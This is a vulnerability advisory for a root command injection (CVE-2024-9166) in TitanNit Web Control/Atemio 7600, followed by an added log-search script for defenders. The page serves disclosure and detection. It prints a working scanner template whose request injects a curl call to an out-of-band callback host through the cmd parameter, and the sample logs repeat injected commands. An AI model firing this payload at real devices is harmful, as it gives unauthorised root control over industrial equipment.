CVE-2024-9166: TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution

Date: 2025-08-01 | Affected software: TitanNit Web Control Atemio 7600 | PoC: public

Vulnerability description

The device contains a command injection vulnerability in the application's 'getcommand' query, which lets unauthorized attackers execute system commands with root privileges. Exploitation requires the attacker to send crafted requests.

PoC code [public]

id: CVE-2024-9166

info:
  name: TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    The device contains a command injection caused by the 'getcommand' query in the application, letting unauthorized attackers execute system commands with root privileges, exploit requires attacker to send crafted requests.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands with root privileges through command injection in the getcommand query parameter, achieving complete control of the TitanNit Web Control device and potentially pivoting to connected industrial control systems.
  remediation: |
    Apply security patches from TitanNit for Web Control 2.01 and Atemio 7600 to address the command injection vulnerability in the getcommand query parameter.
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-24-270-03
    - https://www.exploit-db.com/exploits/51853
    - https://github.com/Andrysqui/CVE-2024-9166
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
  classification:
    cve-id: CVE-2024-9166
    cwe-id: CWE-78
    epss-score: 0.04578
    epss-percentile: 0.8887
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="TitanNit Web Control"
  tags: cve,cve2024,titanit,web-control,oast,rce,ics,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "titan.css"
# digest: 4a0a00473045022100ff344d4fa665670af73f564fed7d24aae96de72b12c8317a6dff041b0ef0bb4602204ab469ab5aada2001206b3dc58fa7733974c3d67cd48698964440ff9a96310ac:922c64590222798bb761d5b6d8e72950
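
For defenders, the request shape the template sends (path /query, a getcommand parameter and a non-empty cmd value) can be searched for in web access logs. The following is an added example, not part of the template or the original page; it assumes a reverse proxy or sensor in front of the device writes combined-format access logs, and the function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Source address and request line of a combined-log-format entry.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Aug/2025:10:00:05 +0000] '
    '"GET /query?getcommand=&cmd=curl+http://oast.example.invalid HTTP/1.1" 200 88',
    '192.0.2.10 - - [01/Aug/2025:10:00:09 +0000] "GET /query?getcommand=&cmd= HTTP/1.1" 200 40',
    '203.0.113.5 - - [01/Aug/2025:10:00:12 +0000] "GET /Query?GetCommand=&CMD=id HTTP/1.1" 200 40',
    '192.0.2.10 - - [01/Aug/2025:10:00:15 +0000] "GET /query?other=1 HTTP/1.1" 200 40',
]


def find_getcommand_requests(lines):
    """Return (source, decoded cmd value) for requests shaped like the template's."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparseable entry: skip rather than guess
        url = urlsplit(m.group("target"))
        # Assumption: match path and parameter names case-insensitively,
        # since the device's own case handling is not documented on this page.
        if url.path.rstrip("/").lower() != "/query":
            continue
        # keep_blank_values: the template sends getcommand with an empty value.
        pairs = [(k.lower(), v) for k, v in parse_qsl(url.query, keep_blank_values=True)]
        if not any(k == "getcommand" for k, _ in pairs):
            continue
        # parse_qsl already URL-decodes, so '+' and %xx encodings are normalised.
        hits += [(m.group("src"), v) for k, v in pairs if k == "cmd" and v.strip()]
    return hits


if __name__ == "__main__":
    for src, cmd in find_getcommand_requests(SAMPLE_LOG):
        print(f"{src}\tcmd={cmd!r}")
```

Whether the device's own web interface legitimately issues such requests is not stated on this page, so hits should be triaged by source address and cmd value.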
